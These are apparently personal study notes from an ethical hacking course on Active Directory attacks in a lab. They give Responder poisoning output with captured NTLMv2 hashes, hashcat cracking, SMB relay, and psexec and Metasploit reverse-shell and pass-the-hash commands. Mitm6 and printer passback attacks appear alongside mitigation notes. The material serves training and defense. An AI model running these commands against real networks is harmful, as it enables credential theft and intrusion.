Capturing Hashes with Responder 2 | > 01.08.2024 3 | 4 | --- 5 | 6 | **Getting Hashes with responder:** 7 | ```bash 8 | ┌──(mrmidnight㉿kali)-[~] 9 | └─$ sudo responder -I eth0 -dwv 10 | __ 11 | .----.-----.-----.-----.-----.-----.--| |.-----.----. 12 | | _| -__|__ --| _ | _ | | _ || -__| _| 13 | |__| |_____|_____| __|_____|__|__|_____||_____|__| 14 | |__| 15 | 16 | NBT-NS, LLMNR & MDNS Responder 3.1.4.0 17 | 18 | To support this project: 19 | Github -> https://github.com/sponsors/lgandx 20 | Paypal -> https://paypal.me/PythonResponder 21 | 22 | Author: Laurent Gaffie (laurent.gaffie@gmail.com) 23 | To kill this script hit CTRL-C 24 | 25 | 26 | [+] Poisoners: 27 | LLMNR [ON] 28 | NBT-NS [ON] 29 | MDNS [ON] 30 | DNS [ON] 31 | DHCP [ON] 32 | 33 | [+] Servers: 34 | HTTP server [ON] 35 | HTTPS server [ON] 36 | WPAD proxy [ON] 37 | Auth proxy [OFF] 38 | SMB server [ON] 39 | Kerberos server [ON] 40 | SQL server [ON] 41 | FTP server [ON] 42 | IMAP server [ON] 43 | POP3 server [ON] 44 | SMTP server [ON] 45 | DNS server [ON] 46 | LDAP server [ON] 47 | MQTT server [ON] 48 | RDP server [ON] 49 | DCE-RPC server [ON] 50 | WinRM server [ON] 51 | SNMP server [OFF] 52 | 53 | [+] HTTP Options: 54 | Always serving EXE [OFF] 55 | Serving EXE [OFF] 56 | Serving HTML [OFF] 57 | Upstream Proxy [OFF] 58 | 59 | [+] Poisoning Options: 60 | Analyze Mode [OFF] 61 | Force WPAD auth [OFF] 62 | Force Basic Auth [OFF] 63 | Force LM downgrade [OFF] 64 | Force ESS downgrade [OFF] 65 | 66 | [+] Generic Options: 67 | Responder NIC [eth0] 68 | Responder IP [192.168.19.131] 69 | Responder IPv6 [fe80::20c:29ff:fe00:b31b] 70 | Challenge set [random] 71 | Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL'] 72 | 73 | [+] Current Session Variables: 74 | Responder Machine Name [WIN-VMVNQ6S306J] 75 | Responder Domain Name [GU6J.LOCAL] 76 | Responder DCE-RPC Port [48918] 77 | 78 | [+] Listening for events... 79 | 80 | [*] [DHCP] Found DHCP server IP: 192.168.19.254, now waiting for incoming requests... 81 | [*] [NBT-NS] Poisoned answer sent to 192.168.19.129 for name MARVEL (service: Domain Master Browser) 82 | [*] [NBT-NS] Poisoned answer sent to 192.168.19.129 for name MARVEL (service: Browser Election) 83 | [SMB] NTLMv2-SSP Client : 192.168.19.129 84 | [SMB] NTLMv2-SSP Username : MARVEL\fcastle 85 | [SMB] NTLMv2-SSP Hash : fcastle::MARVEL:87c6671cca544d9f:CBBFA1353DC46DF44CF3FD145FA3A50E:010100000000000000DA3635F9E3DA0125EDA9C0CB18161E00000000020008004700550036004A0001001E00570049004E002D0056004D0056004E005100360053003300300036004A0004003400570049004E002D0056004D0056004E005100360053003300300036004A002E004700550036004A002E004C004F00430041004C00030014004700550036004A002E004C004F00430041004C00050014004700550036004A002E004C004F00430041004C000700080000DA3635F9E3DA0106000400020000000800300030000000000000000100000000200000789577CE414708CF636AF8CE914B79218F880F523F376082C2C30BA31DE2EDDC0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00310039002E003100330031000000000000000000 86 | [SMB] NTLMv2-SSP Client : 192.168.19.129 87 | [SMB] NTLMv2-SSP Username : MARVEL\fcastle 88 | [SMB] NTLMv2-SSP Hash : fcastle::MARVEL:a85d3509554eefe5:35C2788B56DF319459B7AEB56583C8F4:010100000000000000DA3635F9E3DA011D30D6A5E4BF9A3F00000000020008004700550036004A0001001E00570049004E002D0056004D0056004E005100360053003300300036004A0004003400570049004E002D0056004D0056004E005100360053003300300036004A002E004700550036004A002E004C004F00430041004C00030014004700550036004A002E004C004F00430041004C00050014004700550036004A002E004C004F00430041004C000700080000DA3635F9E3DA0106000400020000000800300030000000000000000100000000200000789577CE414708CF636AF8CE914B79218F880F523F376082C2C30BA31DE2EDDC0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00310039002E003100330031000000000000000000 89 | [SMB] NTLMv2-SSP Client : 192.168.19.129 90 | [SMB] NTLMv2-SSP Username : MARVEL\fcastle 91 | [SMB] NTLMv2-SSP Hash : fcastle::MARVEL:04312f82f72127a6:B4F8B25F60830DB8A0947D7D01948EEA:010100000000000000DA3635F9E3DA01C22C15D04598FC2900000000020008004700550036004A0001001E00570049004E002D0056004D0056004E005100360053003300300036004A0004003400570049004E002D0056004D0056004E005100360053003300300036004A002E004700550036004A002E004C004F00430041004C00030014004700550036004A002E004C004F00430041004C00050014004700550036004A002E004C004F00430041004C000700080000DA3635F9E3DA0106000400020000000800300030000000000000000100000000200000789577CE414708CF636AF8CE914B79218F880F523F376082C2C30BA31DE2EDDC0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00310039002E003100330031000000000000000000 92 | [SMB] NTLMv2-SSP Client : 192.168.19.129 93 | [SMB] NTLMv2-SSP Username : MARVEL\fcastle 94 | [SMB] NTLMv2-SSP Hash : fcastle::MARVEL:21cc3b2f6965a52d:91ADFC1DBF88820C1FFA929F821B8FD6:010100000000000000DA3635F9E3DA017D3C9D02B4D95E0700000000020008004700550036004A0001001E00570049004E002D0056004D0056004E005100360053003300300036004A0004003400570049004E002D0056004D0056004E005100360053003300300036004A002E004700550036004A002E004C004F00430041004C00030014004700550036004A002E004C004F00430041004C00050014004700550036004A002E004C004F00430041004C000700080000DA3635F9E3DA0106000400020000000800300030000000000000000100000000200000789577CE414708CF636AF8CE914B79218F880F523F376082C2C30BA31DE2EDDC0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00310039002E003100330031000000000000000000 95 | ``` 96 | 97 | **Retrieved hash:** 98 | ``` 99 | fcastle::MARVEL:87c6671cca544d9f:CBBFA1353DC46DF44CF3FD145FA3A50E:010100000000000000DA3635F9E3DA0125EDA9C0CB18161E00000000020008004700550036004A0001001E00570049004E002D0056004D0056004E005100360053003300300036004A0004003400570049004E002D0056004D0056004E005100360053003300300036004A002E004700550036004A002E004C004F00430041004C00030014004700550036004A002E004C004F00430041004C00050014004700550036004A002E004C004F00430041004C000700080000DA3635F9E3DA0106000400020000000800300030000000000000000100000000200000789577CE414708CF636AF8CE914B79218F880F523F376082C2C30BA31DE2EDDC0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00310039002E003100330031000000000000000000 100 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/03. Cracking Our Captured Hashes.md: -------------------------------------------------------------------------------- 1 | # Cracking Our Captured Hashes 2 | > 01.08.2024 3 | --- 4 | 5 | **Put hash into a text file:** 6 | ```bash 7 | vim hashes.txt 8 | 9 | fcastle::MARVEL:87c6671cca544d9f:CBBFA1353DC46DF44CF3FD145FA3A50E:010100000000000000DA3635F9E3DA0125EDA9C0CB18161E00000000020008004700550036004A0001001E00570049004E002D0056004D0056004E005100360053003300300036004A0004003400570049004E002D0056004D0056004E005100360053003300300036004A002E004700550036004A002E004C004F00430041004C00030014004700550036004A002E004C004F00430041004C00050014004700550036004A002E004C004F00430041004C000700080000DA3635F9E3DA0106000400020000000800300030000000000000000100000000200000789577CE414708CF636AF8CE914B79218F880F523F376082C2C30BA31DE2EDDC0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00310039002E003100330031000000000000000000 10 | ``` 11 | 12 | 13 | **Cracking the hash with hashcat (on windows host machine):** 14 | ```powershell 15 | .\hashcat.exe -m 5600 .\hashes\hash.txt .\wordlists\rockyou.txt 16 | hashcat (v6.2.6) starting 17 | 18 | Successfully initialized the NVIDIA main driver CUDA runtime library. 19 | 20 | Failed to initialize NVIDIA RTC library. 21 | 22 | * Device #1: CUDA SDK Toolkit not installed or incorrectly installed. 23 | CUDA SDK Toolkit required for proper device support and utilization. 24 | Falling back to OpenCL runtime. 25 | 26 | * Device #1: WARNING! Kernel exec timeout is not disabled. 27 | This may cause "CL_OUT_OF_RESOURCES" or related errors. 28 | To disable the timeout, see: https://hashcat.net/q/timeoutpatch 29 | OpenCL API (OpenCL 3.0 CUDA 12.6.32) - Platform #1 [NVIDIA Corporation] 30 | ======================================================================= 31 | * Device #1: NVIDIA GeForce RTX 4070 SUPER, 12160/12281 MB (3070 MB allocatable), 56MCU 32 | 33 | OpenCL API (OpenCL 3.0 ) - Platform #2 [Intel(R) Corporation] 34 | ============================================================= 35 | * Device #2: Intel(R) UHD Graphics 770, 15072/30240 MB (2047 MB allocatable), 32MCU 36 | 37 | Minimum password length supported by kernel: 0 38 | Maximum password length supported by kernel: 256 39 | 40 | Hashes: 1 digests; 1 unique digests, 1 unique salts 41 | Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates 42 | Rules: 1 43 | 44 | Optimizers applied: 45 | * Zero-Byte 46 | * Not-Iterated 47 | * Single-Hash 48 | * Single-Salt 49 | 50 | ATTENTION! Pure (unoptimized) backend kernels selected. 51 | Pure kernels can crack longer passwords, but drastically reduce performance. 52 | If you want to switch to optimized kernels, append -O to your commandline. 53 | See the above message to find out about the exact limits. 54 | 55 | Watchdog: Temperature abort trigger set to 90c 56 | 57 | Host memory required for this attack: 1545 MB 58 | 59 | Dictionary cache built: 60 | * Filename..: .\wordlists\rockyou.txt 61 | * Passwords.: 14344391 62 | * Bytes.....: 139921497 63 | * Keyspace..: 14344384 64 | * Runtime...: 0 secs 65 | 66 | FCASTLE::MARVEL:87c6671cca544d9f:cbbfa1353dc46df44cf3fd145fa3a50e:010100000000000000da3635f9e3da0125eda9c0cb18161e000000000200080047 700550036004a0001001e00570049004e002d0056004d0056004e005100360053003300300036004a0004003400570049004e002d0056004d0056004e005100360053 3003300300036004a002e004700550036004a002e004c004f00430041004c00030014004700550036004a002e004c004f00430041004c00050014004700550036004a a002e004c004f00430041004c000700080000da3635f9e3da0106000400020000000800300030000000000000000100000000200000789577ce414708cf636af8ce91 14b79218f880f523f376082c2c30ba31de2eddc0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038 8002e00310039002e003100330031000000000000000000:Password1 67 | 68 | Session..........: hashcat 69 | Status...........: Cracked 70 | Hash.Mode........: 5600 (NetNTLMv2) 71 | Hash.Target......: FCASTLE::MARVEL:87c6671cca544d9f:cbbfa1353dc46df44c...000000 72 | Time.Started.....: Thu Aug 01 17:13:17 2024 (0 secs) 73 | Time.Estimated...: Thu Aug 01 17:13:17 2024 (0 secs) 74 | Kernel.Feature...: Pure Kernel 75 | Guess.Base.......: File (.\wordlists\rockyou.txt) 76 | Guess.Queue......: 1/1 (100.00%) 77 | Speed.#1.........: 0 H/s (0.00ms) @ Accel:512 Loops:1 Thr:64 Vec:1 78 | Speed.#2.........: 3897.8 kH/s (6.45ms) @ Accel:16 Loops:1 Thr:64 Vec:1 79 | Speed.#*.........: 3897.8 kH/s 80 | Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new) 81 | Progress.........: 32768/14344384 (0.23%) 82 | Rejected.........: 0/32768 (0.00%) 83 | Restore.Point....: 0/14344384 (0.00%) 84 | Restore.Sub.#1...: Salt:0 Amplifier:0-0 Iteration:0-1 85 | Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1 86 | Candidate.Engine.: Device Generator 87 | Candidates.#1....: [Copying] 88 | Candidates.#2....: 123456 -> dyesebel 89 | Hardware.Mon.#1..: Temp: 43c Fan: 0% Util: 72% Core: 390MHz Mem:5001MHz Bus:16 90 | Hardware.Mon.#2..: N/A 91 | 92 | Started: Thu Aug 01 17:12:59 2024 93 | Stopped: Thu Aug 01 17:13:18 2024 94 | ``` 95 | 96 | **Cracked Password:** 97 | ```powershell 98 | .\hashcat.exe -m 5600 .\hashes\hash.txt .\wordlists\rockyou.txt --show 99 | 100 | FCASTLE::MARVEL:87c6671cca544d9f:cbbfa1353dc46df44cf3fd145fa3a50e:010100000000000000da3635f9e3da0125eda9c0cb18161e00000000020008004700550036004a0001001e00570049004e002d0056004d0056004e005100360053003300300036004a0004003400570049004e002d0056004d0056004e005100360053003300300036004a002e004700550036004a002e004c004f00430041004c00030014004700550036004a002e004c004f00430041004c00050014004700550036004a002e004c004f00430041004c000700080000da3635f9e3da0106000400020000000800300030000000000000000100000000200000789577ce414708cf636af8ce914b79218f880f523f376082c2c30ba31de2eddc0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00310039002e003100330031000000000000000000:Password1 101 | ``` -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/04. LLMNR Poison Mitigation.md: -------------------------------------------------------------------------------- 1 | # LLMNR Poison Mitigation 2 | > 05.05.2024 3 | 4 | 5 | **The best defense against LLMNR Poisoning:** 6 | - Disable LLMNR and NBT-NS 7 | - To Disable LLMNR, select "Turn OFF Multicase Name Resolution" under Local Computer Policy > Computer > Configuration > Administrative Templates > Network > DNS client in the Group Policy Editor. 8 | - Do Disable NBT-TS, navigate to Network Connections >Network Adapter Properties > TCP / IPv4 Properties > Advanced tab > WINS tab and select "Disable NetBIOS over TCP / IP". 9 | **Best action if disabling is not a option:** 10 | - Require Network Access Control 11 | - Require strong user password. The more complex the better -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/05. SMB Relay Attacks Overview.md: -------------------------------------------------------------------------------- 1 | # SMB Relay Attacks Overview 2 | > 01.08.2024 3 | --- 4 | 5 | ## What is SMB Relay? 6 | Instead of cracking hashes gathered with Responder. We can relay those hashes to specific machines and potentially gain access. 7 | 8 | **Requirements for SMB Relay:** 9 | - SMB signing must be disabled or not enforced on the target. 10 | - Relayed user credentials must be admin on machines. 11 | - Cannot relay to self. 12 | 13 | ## Identify Host Without SMB Signing 14 | **With Nmap:** 15 | ```bash 16 | nmap --script=smb2-security-mode.nse -p445 17 | 18 | nmap --script=smb2-security-mode.nse -p445 10.0.2.25 19 | 20 | ... 21 | Message signing enabled but not required 22 | ... 23 | ``` 24 | 25 | ## SMB Relay 26 | **Step 1: Edit Responder config:** 27 | 28 | ```bash 29 | sudo subl /etc/responder/Responder.conf 30 | 31 | Responder Core] 32 | 33 | ; Servers to start 34 | SQL = On 35 | SMB = Off * 36 | RDP = On 37 | Kerberos = On 38 | FTP = On 39 | POP = On 40 | SMTP = On 41 | IMAP = On 42 | HTTP = On 43 | HTTPS = Off * 44 | DNS = On 45 | LDAP = On 46 | DCERPC = On 47 | WINRM = On 48 | SNMP = Off 49 | MQTT = On 50 | ``` 51 | 52 | **Step 2: Run Responder:** 53 | ```bash 54 | sudo responder -I eth0 -dw 55 | ``` 56 | 57 | **Step 3: Set up relay:** 58 | ```bash 59 | sudo ntlmrelayx.py -tf targets.txt -smb2support 60 | ``` 61 | 62 | **Step 4: Occur an event:** 63 | For example trying to access the target machines ip in explorer: `\\attackerip` 64 | 65 | **Step 5: Win:** 66 | Dumps the SAM hashes. 67 | 68 | *Other Wins:* 69 | ```bash 70 | sudo ntlmrelayx.py -tf targets.txt -smb2support -i 71 | ``` 72 | This will try to get a interactive shell! 73 | 74 | ```bash 75 | sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami" 76 | ``` 77 | A basic command execution on the target machine. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/07. SMB Relay Attack Defenses.md: -------------------------------------------------------------------------------- 1 | # SMB Relay Attack Defenses 2 | > 01.08.2024 3 | --- 4 | 5 | ## Migration Strategies: 6 | 7 | - **Enable SMB Signing on all devices** 8 | - Pro: Completely stops the attack 9 | - Con: Can cause performance issues with file copies 10 | - **Disable NTLM authentication on network 11 | - Pro: Completely stops the attack 12 | - Con: If Kerberos stops working, Windows defaults back to NTLM 13 | - **Account tiering** 14 | - Pro: Limits domain admins to specific tasks (e.g. only log onto server with need for DA) 15 | - Con: Enforcing the policy may be difficult 16 | - **Local admin restrictions** 17 | - Pro: Can prevent a lot of lateral movement 18 | - Con: Potential increase in the amount of service desk tickets -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/08. Gaining Shell Access.md: -------------------------------------------------------------------------------- 1 | # Gaining Shell Access 2 | > 01.08.2024 3 | --- 4 | 5 | ## Gaining Shell Access: 6 | 7 | **Via Metasploit / password needed:** 8 | ```bash 9 | msfconsole -q 10 | use exploit/windows/smb/psexec 11 | ``` 12 | Set either the `SMBPass` with the enumerated Password, or set it to a hash 13 | 14 | **Via psexec / password needed:** 15 | ```bash 16 | psexec.py marvel.local/fcastle:'Password1'@10.0.2.5 17 | ``` 18 | More quiet option. 19 | 20 | **Via psexec / hash needed:** 21 | ```bash 22 | psexec.py administrator@10.0.2.5 -hashes LM:NT 23 | ``` 24 | 25 | ## Lab hacking: 26 | 27 | MARVEL-DC: `192.168.19.128` 28 | THEPUNISHER: `192.168.19.129` 29 | SPIDERMAN: `192.168.19.130` 30 | HackerMan: `192.168.19.131` 31 | 32 | 33 | **Setting up Metasploit:** 34 | 35 | ```bash 36 | msfconsole -q 37 | use exploit/windows/smb/psexec 38 | set payload windows/x64/meterpreter/reverse_tcp 39 | set RHOSTS 192.168.19.129 40 | set smbdomain MARVEL.local 41 | set smbuser fcastle 42 | set smbpass Password1 43 | run 44 | ``` 45 | 46 | **Background session and interact with sessions:** 47 | ```bash 48 | meterpreter > background 49 | sessions 50 | sessions 1 51 | ``` 52 | 53 | **Hash attack:** 54 | `administrator:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f` 55 | ```bash 56 | set smbuser administrator 57 | unset smbdomain 58 | set smbpass aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f 59 | run 60 | 61 | [*] Started reverse TCP handler on 192.168.19.131:4444 62 | [*] 192.168.19.129:445 - Connecting to the server... 63 | [*] 192.168.19.129:445 - Authenticating to 192.168.19.129:445 as user 'administrator'... 64 | [*] 192.168.19.129:445 - Selecting PowerShell target 65 | [*] 192.168.19.129:445 - Executing the payload... 66 | [+] 192.168.19.129:445 - Service start timed out, OK if running a command or non-service executable... 67 | [*] Sending stage (201798 bytes) to 192.168.19.129 68 | [*] Meterpreter session 2 opened (192.168.19.131:4444 -> 192.168.19.129:49511) at 2024-08-01 12:43:50 -0500 69 | 70 | meterpreter > 71 | ``` 72 | Password reuse! peterparker hash is the same as frankcastle hash. 73 | 74 | **Manual way / with psexec:** 75 | ```bash 76 | impacket-psexec MARVEL/fcastle:'Password1'@192.168.19.129 77 | 78 | Impacket v0.12.0.dev1 - Copyright 2023 Fortra 79 | 80 | [*] Requesting shares on 192.168.19.129..... 81 | [*] Found writable share ADMIN$ 82 | [*] Uploading file jKPkWteS.exe 83 | [*] Opening SVCManager on 192.168.19.129..... 84 | [*] Creating service qaUG on 192.168.19.129..... 85 | [*] Starting service qaUG..... 86 | [!] Press help for extra shell commands 87 | Microsoft Windows [Version 10.0.19045.4651] 88 | (c) Microsoft Corporation. All rights reserved. 89 | 90 | C:\Windows\system32> 91 | ``` 92 | 93 | **Manual way / with psexec + hash:** 94 | ```bash 95 | impacket-psexec administrator@192.168.19.129 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f 96 | 97 | Impacket v0.12.0.dev1 - Copyright 2023 Fortra 98 | 99 | [*] Requesting shares on 192.168.19.129..... 100 | [*] Found writable share ADMIN$ 101 | [*] Uploading file GJJwOpGH.exe 102 | [*] Opening SVCManager on 192.168.19.129..... 103 | [*] Creating service MRXo on 192.168.19.129..... 104 | [*] Starting service MRXo..... 105 | [!] Press help for extra shell commands 106 | Microsoft Windows [Version 10.0.19045.4651] 107 | (c) Microsoft Corporation. All rights reserved. 108 | 109 | C:\Windows\system32> 110 | ``` 111 | 112 | 113 | **Manual way / smbexec:** 114 | ```bash 115 | impacket-smbexec MARVEL/fcastle:'Password1'@192.168.19.129 116 | 117 | Impacket v0.12.0.dev1 - Copyright 2023 Fortra 118 | 119 | [!] Launching semi-interactive shell - Careful what you execute 120 | C:\Windows\system32> 121 | ``` 122 | 123 | *With hash:* 124 | ```bash 125 | impacket-smbexec administrator@192.168.19.129 -hashes 126 | aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f 127 | 128 | Impacket v0.12.0.dev1 - Copyright 2023 Fortra 129 | 130 | [!] Launching semi-interactive shell - Careful what you execute 131 | C:\Windows\system32> 132 | 133 | ``` 134 | 135 | 136 | **Manual way / wmiexec:** 137 | 138 | ```bash 139 | impacket-wmiexec MARVEL/fcastle:'Password1'@192.168.19.129 140 | ``` 141 | 142 | *With hash:* 143 | ```bash 144 | impacket-wmiexec administrator@192.168.19.129 -hashes 145 | aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f 146 | 147 | -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/09. IPv6 Attacks Overview.md: -------------------------------------------------------------------------------- 1 | # IPv6 Attacks Overview 2 | > 02.08.2024 3 | --- 4 | 5 | ## IPv6 Scanning and Reconnaissance 6 | 7 | IPv6's large address space makes it difficult to scan for active hosts. However, attackers can use techniques like: 8 | 9 | - **Multicast scanning**: Sending multicast packets to discover active hosts. 10 | - **IPv6 neighbor discovery**: Using the Neighbor Discovery Protocol (NDP) to discover hosts on the same network. 11 | 12 | ## IPv6 Spoofing 13 | 14 | Spoofing involves sending packets with a forged source IP address. In IPv6, this can be done using: 15 | 16 | - **IPv6 extension headers**: Maliciously crafting extension headers to disguise the source IP address. 17 | - **IPv6 fragmentation**: Fragmenting packets to evade security controls. 18 | 19 | ## IPv6 Neighbor Discovery Protocol (NDP) Attacks 20 | 21 | NDP is used for address resolution and router discovery. Attacks include: 22 | 23 | - **NDP spoofing**: Spoofing NDP messages to hijack traffic or disrupt connectivity. 24 | - **Router advertisement spoofing**: Spoofing router advertisements to redirect traffic. 25 | 26 | ## IPv6 Duplicate Address Detection (DAD) Attacks 27 | 28 | DAD is used to detect duplicate IP addresses on a network. Attacks include: 29 | 30 | - **DAD spoofing**: Spoofing DAD messages to disrupt connectivity or hijack traffic. 31 | 32 | ## IPv6 Router Advertisement (RA) Guard Evasion 33 | 34 | RA Guard is a security feature that filters out malicious router advertisements. Attacks involve: 35 | 36 | - **RA Guard evasion**: Using techniques like fragmentation or extension headers to evade RA Guard. 37 | 38 | ## IPv6 Man-in-the-Middle (MitM) Attacks 39 | 40 | MitM attacks involve intercepting and modifying traffic. In IPv6, this can be done using: 41 | 42 | - **IPv6 spoofing**: Spoofing IP addresses to intercept traffic. 43 | - **NDP spoofing**: Spoofing NDP messages to hijack traffic. 44 | 45 | ## IPv6 Denial of Service (DoS) Attacks 46 | 47 | DoS attacks involve overwhelming a network or host with traffic. In IPv6, this can be done using: 48 | 49 | - **IPv6 flooding**: Sending large amounts of traffic to overwhelm a network or host. 50 | - **IPv6 fragmentation**: Fragmenting packets to evade security controls and overwhelm a network or host. 51 | 52 | To mitigate these attacks, it's essential to implement IPv6 security measures, such as: 53 | 54 | - **IPv6 firewalls**: Configuring firewalls to filter out malicious IPv6 traffic. 55 | - **IPv6 intrusion detection and prevention systems**: Monitoring and blocking suspicious IPv6 traffic. 56 | - **Secure neighbor discovery**: Implementing Secure Neighbor Discovery (SEND) to authenticate NDP messages. 57 | - **RA Guard**: Configuring RA Guard to filter out malicious router advertisements. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/10. IPv6 DNS Takeover via mitm6.md: -------------------------------------------------------------------------------- 1 | # IPv6 DNS Takeover via mitm6 2 | > 03.08.2024 3 | --- 4 | ### Ip Addresses 5 | MARVEL-DC: `192.168.19.128` 6 | THEPUNISHER: `192.168.19.129` 7 | SPIDERMAN: `192.168.19.130` 8 | HackerMan: `192.168.19.131` 9 | 10 | **Setup ntlm relay:** 11 | ```bash 12 | impacket-ntlmrelayx -6 -t ldaps://192.168.19.128 -wh fakewpad.marvel.local -l lootme 13 | 14 | [*] Protocol Client HTTP loaded.. 15 | [*] Protocol Client HTTPS loaded.. 16 | [*] Protocol Client MSSQL loaded.. 17 | [*] Protocol Client IMAPS loaded.. 18 | [*] Protocol Client IMAP loaded.. 19 | [*] Protocol Client DCSYNC loaded.. 20 | [*] Protocol Client SMTP loaded.. 21 | [*] Protocol Client RPC loaded.. 22 | [*] Protocol Client LDAP loaded.. 23 | [*] Protocol Client LDAPS loaded.. 24 | [*] Protocol Client SMB loaded.. 25 | [*] Running in relay mode to single host 26 | [*] Setting up SMB Server 27 | [*] Setting up HTTP Server on port 80 28 | [*] Setting up WCF Server 29 | [*] Setting up RAW Server on port 6666 30 | 31 | [*] Servers started, waiting for connections 32 | ``` 33 | 34 | **Running mitm6:** 35 | ```bash 36 | sudo mitm6 -d marvel.local 37 | ``` 38 | 39 | **Rebooting PUNISHER machine for trigger:** 40 | reboot... 41 | 42 | **Result:** 43 | It will create a folder that contains domain information and in the best case, create a user on the domain controller! -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/11. IPv6 Attack Defenses.md: -------------------------------------------------------------------------------- 1 | # IPv6 Attack Defenses 2 | > 02.08.2024 3 | --- 4 | 5 | ## Mitigation Strategies 6 | 7 | IPv6 poisoning abuses the fact that windows queries for an IPv6 address even in IPv4-only environments. If you do not use the IPv6 internally, the safest way to prevent mitm6 is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. Disabling IPv6 entirely may have unwanted side effects. Setting the following predefined rules to Block instead of Allow prevents the attack from working: 8 | 9 | - (Inbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-In) 10 | - (Inbound) Core Networking - Router Advertisement (ICMPv6-In) 11 | - (Outbound) Core Networking - Dynamic Host Configuration Protocol for IPv6(DHCPV6-Out) 12 | 13 | If WPAD is not in use internally, disable it via Group Policy and disabling the WinHttpAutoProxySvc service. 14 | 15 | Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding 16 | 17 | Consider Administrative users to the Protected Users group or marking them as Account is sensitive and cannot be delegated, which will prevent any impersonation of that user via delegation. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/12. Passback Attacks.md: -------------------------------------------------------------------------------- 1 | # Passback Attacks 2 | > 03.08.2024 3 | --- 4 | 5 | https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack 6 | 7 | ## Summerize 8 | 9 | **What is an MFP and MFP Hacking anyway?** 10 | 11 | Multi-Function Peripherals (MFPs) are often overlooked in penetration testing, but they can provide a wealth of information and access to a network. 12 | 13 | - Credential Disclosure 14 | - File System Access 15 | - Memory Access 16 | 17 | MFPs (Multi-Function Peripherals) are devices typically found in corporate closets, equipped with: 18 | 19 | - Network ports 20 | - USB drives 21 | - Control panels with specialized applications 22 | 23 | They offer more than just basic copy, print, and fax functions, including: 24 | 25 | - Integration with corporate networks for scan/email capabilities 26 | - Functionality that requires: 27 | - LDAP (Lightweight Directory Access Protocols) integration 28 | - SMTP (Simple Mail Transfer Protocol) integration 29 | - Network Shares 30 | 31 | **Did You Say LDAP?** 32 | 33 | MFPs use Lightweight Directory Access Protocols (LDAP) integration, which can be used to control access to printing, copying, and scanning. By modifying the LDAP server field in the Embedded Web Service (EWS), an attacker can capture credentials and gain access to the network. 34 | 35 | **Why MFP Hacking Matters** 36 | 37 | A successful MFP breach can result in credential disclosure, file system access, and memory access. MFPs are a prime target for penetration testing due to their physical accessibility, poor management, and default credentials. 38 | 39 | **Introducing the Pass-Back Attack** 40 | 41 | The Pass-Back Attack involves replacing the legitimate LDAP server with a malicious one, allowing the attacker to capture credentials and gain access to the network. 42 | 43 | **Accessing the EWS** 44 | 45 | Most MFPs ship with default administrative credentials to access the EWS. These credentials can be used to gain initial access to the MFP. 46 | 47 | - https://github.com/RUB-NDS/PRET 48 | - https://github.com/percx/Praeda 49 | - https://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet 50 | 51 | **Replace LDAP Attributes** 52 | 53 | Once authenticated to the EWS, an attacker can modify the LDAP settings to point to a malicious LDAP server. 54 | 55 | ![[Passback Attacks 01.webp]] 56 | 57 | **Capture Credentials** 58 | Set up a listener with netcat or responder. The next time a user inputs their credentials at the control panel, the MFP will send their information to the LDAP server under the attacker's control. 59 | 60 | ![[Passback Attacks 02.webp]] 61 | 62 | **Attacking SMTP and Windows Sign-in** 63 | 64 | This attack can also be conducted against other settings on the MFP that support authentication, such as SMTP and Windows sign-in. 65 | 66 | ![[Passback Attacks 03.webp]] 67 | 68 | Conducting attacks on the SMTP configuration can also produce fruitful results. The existing SMTP configuration for this MFP has stored credentials for SMTP authentication that can be passed back to us, after replacing the existing SMTP server with our own SMTP server. 69 | 70 | ![[Passback Attacks 04.webp]] 71 | 72 | **Big Payout with Low Risk** 73 | 74 | MFPs are a prime target for penetration testing due to their high payout potential and low risk. 75 | 76 | **Get Started with MFP Hacking and Pen Testing** 77 | 78 | To get started with MFP hacking and pen testing, you can use tools like the Printer Exploitation Toolkit (PRET) and Praeda, and learn more about pen testing services and cybersecurity consulting. -------------------------------------------------------------------------------- /Practical Ethical Hacking - The Complete Course/14. Attacking Active Directory (Initial Attack Vectors)/13. Initial Internal Attack Strategy.md: -------------------------------------------------------------------------------- 1 | # Initial Internal Attack Strategy 